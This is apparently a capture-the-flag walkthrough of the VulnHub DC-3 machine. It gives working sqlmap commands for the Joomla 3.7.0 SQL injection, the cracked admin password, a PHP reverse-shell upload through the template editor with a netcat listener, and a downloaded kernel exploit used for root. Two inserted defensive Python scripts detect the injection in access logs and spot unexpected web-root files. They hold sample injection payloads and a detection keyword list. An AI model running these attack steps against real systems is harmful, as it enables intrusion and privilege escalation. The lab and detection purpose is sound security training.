VulnHub – DC-3

A ping sweep using nmap -sn 10.0.2.* reveals the IP address of DC-3 as 10.0.2.27.

A port scan using nmap -A 10.0.2.27 shows that port 80 is the only open port and that it is running a Joomla-based page.

Using joomscan -u http://10.0.2.27 reveals that the Joomla version is 3.7.0.

searchsploit joomla 3.7.0 reveals that this particular version is vulnerable to SQL injection; there's even a text file that documents an sqlmap command to run against it.

Running the command sqlmap -u "http://10.0.2.27/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] reveals 5 databases. (The URL is quoted so that the shell does not treat the & characters as background operators.)

I then modified the command to sqlmap -u "http://10.0.2.27/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
This lists the tables in joomladb. I am particularly interested in #__users.

I then modified the command further to find the columns within the table #__users:
sqlmap -u "http://10.0.2.27/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
This reveals 4 columns but unfortunately no password column.

I modified the command once more to:
sqlmap -u "http://10.0.2.27/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C username,password -p list[fullordering] --dump
This pulls the username column and, hopefully, an unlisted password column from the #__users table.

This successfully pulled the username admin and a password hash. I then used John the Ripper to crack the hash, which was revealed to be snoopy.
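From the defender's side, the sqlmap enumeration above leaves a clear trail in the web server's access log: every request carries the com_fields modal view with a list[fullordering] value that is not a plain "column ASC|DESC" ordering. The following is an added example (not part of the original writeup) that parses constructed Apache combined-format log lines and flags such requests. Because the writeup's scan used --random-agent, matching on the sqlmap User-Agent alone would miss it, so the check keys on the parameter value and treats the User-Agent as a secondary indicator. The sample log lines, the IP addresses and the legitimate-ordering pattern are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" access-log lines for illustration; not real DC-3 traffic.
SAMPLE_LOG = """\
10.0.2.15 - - [10/Mar/2019:14:02:11 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"
10.0.2.15 - - [10/Mar/2019:14:03:45 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%28NULL%2Cconcat%280x3a%2Cversion%28%29%29%2CNULL%29 HTTP/1.1" 500 1107 "-" "sqlmap/1.3.2#stable (http://sqlmap.org)"
10.0.2.15 - - [10/Mar/2019:14:03:46 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.id+ASC HTTP/1.1" 200 8812 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/72.0"
10.0.2.15 - - [10/Mar/2019:14:03:47 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=extractvalue%281%2Cconcat%280x7e%2Cdatabase%28%29%29%29 HTTP/1.1" 500 1107 "-" "Mozilla/5.0 (Macintosh) Safari/12.0"
"""

# Apache combined log format: ip ident user [ts] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# A legitimate Joomla list ordering looks like "<column> ASC|DESC", e.g. "a.ordering ASC"
# (assumed pattern for this example).
LEGIT_ORDERING = re.compile(r'^[A-Za-z_][\w.]*\s+(ASC|DESC)$', re.IGNORECASE)
# MySQL functions commonly seen in error-based and time-based injection payloads.
SQLI_FUNCS = ("updatexml", "extractvalue", "sleep", "benchmark", "concat")


def parse_line(line):
    """Return a dict with ip/ts/method/target/status/ua/params, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    query = urlsplit(rec["target"]).query
    # parse_qs percent-decodes keys and values and turns "+" into a space, so the
    # encoded list%5Bfullordering%5D key becomes "list[fullordering]".
    rec["params"] = parse_qs(query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the list of reasons this request looks like SQLi against com_fields."""
    reasons = []
    if rec["ua"].lower().startswith("sqlmap"):
        reasons.append("sqlmap user-agent")
    for value in rec["params"].get("list[fullordering]", []):
        if not LEGIT_ORDERING.match(value):
            reasons.append(f"non-ordering value in list[fullordering]: {value!r}")
        low = value.lower()
        if any(func + "(" in low for func in SQLI_FUNCS):
            reasons.append("SQL function call in ordering parameter")
    return reasons


def analyze(log_text):
    """Scan a block of log text and return one finding per suspicious line."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({"line": n, "ip": rec["ip"],
                             "status": rec["status"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f['line']} from {f['ip']} (HTTP {f['status']}): "
              + "; ".join(f["reasons"]))
```

Feed a real access log through analyze() and line 3 in the sample shows why the ordering check matters: a benign sort request to the same view is left alone, while both the default-agent and the browser-agent injection requests are flagged. A burst of HTTP 500 responses from one client on this endpoint is a useful corroborating signal, since error-based payloads deliberately provoke database errors.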

I then opened Firefox and navigated to the usual Joomla admin login page, 10.0.2.27/administrator, where I successfully logged in with the username and password pulled from the database.

Navigating to the templates page shows that the protostar template is set as the default. At this point the plan is to upload the usual PHP reverse shell.

I tried pasting the code into index.php and previewing the page, but this didn't work. I then created a new file for the shell called shell.php.

I copied the PHP script into this file and set up a listener using nc -lvp 1234.

With everything now in place, I navigated to the new page I created, 10.0.2.27/templates/protostar/shell.php.
The page hangs, and checking back on my listener confirms I have a shell!

I first of all used Python to spawn a bash shell using python -c 'import pty; pty.spawn("/bin/bash")'
I then began enumerating, first checking who I was logged in as, then the operating system and the kernel it was running, using the commands:
id
uname -a
cat /etc/*-release

Using searchsploit ubuntu 16.04 reveals quite a few potential vulnerabilities that could lead to privilege escalation.

After unsuccessfully trying a few of these, I found some success using the 'double-fdput()' vulnerability (39772.txt). This detailed the vulnerability along with a URL to download a script to trigger it. Excellent!

The plan now is to download the script onto DC-3. First of all I'll need a directory that I have permission to write to; /var/www/html was my first thought, as I'm logged in as www-data, and this was confirmed using ls -la.
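Two conditions made the post-login steps above easy: the template directory accepted a brand-new shell.php through the admin template editor, and /var/www/html itself was writable by www-data, which let the exploit be downloaded and built in place. Both are detectable from the filesystem. The following is an added example (not the writeup's code and not a Joomla tool) that hashes every .php file under a webroot against a baseline taken from a known-good install, then reports unknown PHP files, modified PHP files, and directories the web user can write to outside an allowlist. The demo builds a constructed mini-webroot in a temporary directory; the allowlist of expected-writable directories and the use of the current user to stand in for www-data are assumptions made for the example.

```python
import hashlib
import os
import stat
import tempfile

# Directories a Joomla site legitimately needs to write to (assumption for this
# example; adjust to the real site's layout).
EXPECTED_WRITABLE = {"cache", "administrator/cache", "logs", "tmp", "images"}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Record the hash of every .php file under root; run this on a known-good install."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def scan_webroot(root, baseline, web_uid):
    """Compare the live webroot against the baseline and check directory permissions."""
    findings = {"unknown_php": [], "modified_php": [], "writable_dirs": []}
    for dirpath, _, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        st = os.stat(dirpath)
        # The web user can write here if the directory is world-writable or it owns
        # the directory and the owner write bit is set (group write is ignored here).
        web_can_write = bool(st.st_mode & stat.S_IWOTH) or (
            st.st_uid == web_uid and bool(st.st_mode & stat.S_IWUSR))
        if web_can_write and rel_dir not in EXPECTED_WRITABLE:
            findings["writable_dirs"].append(rel_dir)
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if rel not in baseline:
                findings["unknown_php"].append(rel)
            elif baseline[rel] != sha256_file(full):
                findings["modified_php"].append(rel)
    for v in findings.values():
        v.sort()
    return findings


def demo():
    """Build a constructed mini-webroot, take a baseline, then reproduce the indicators."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "templates", "protostar")
        os.makedirs(tpl)
        os.makedirs(os.path.join(root, "images"))
        with open(os.path.join(tpl, "index.php"), "w") as f:
            f.write("<?php // template entry point\n")
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write("<?php // site entry point\n")
        baseline = build_baseline(root)
        # Indicators matching the writeup: a new PHP file in the template directory
        # and an edit to the template's index.php (constructed content).
        with open(os.path.join(tpl, "shell.php"), "w") as f:
            f.write("<?php // unexpected file\n")
        with open(os.path.join(tpl, "index.php"), "a") as f:
            f.write("// edited\n")
        # In the lab, www-data owned /var/www/html; here the current user plays
        # www-data, so every directory it owns with u+w is reported.
        return scan_webroot(root, baseline, web_uid=os.getuid())


if __name__ == "__main__":
    for key, items in demo().items():
        print(f"{key}: {items}")
```

On a real host you would run build_baseline() once after deployment (storing the result off-box), then run scan_webroot() from cron or a file-integrity job with the uid of www-data. Any entry in unknown_php or modified_php under templates/ is exactly the trace the admin-editor upload leaves, and a webroot that shows up in writable_dirs is what allowed the privilege escalation tooling to be staged on disk.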

I used wget with the URL provided in the text file from searchsploit to download the script.

I unzipped the file and navigated into the new 39772 folder, where there was a file called exploit.tar.
I extracted this file using tar -xf exploit.tar.

I moved into the new folder ebpf_mapfd_doubleput_exploit, where I ran the shell script compile.sh.
This created a new file called doubleput.

Running doubleput successfully escalated my privileges to root!

I then navigated to the root directory to grab the flag.
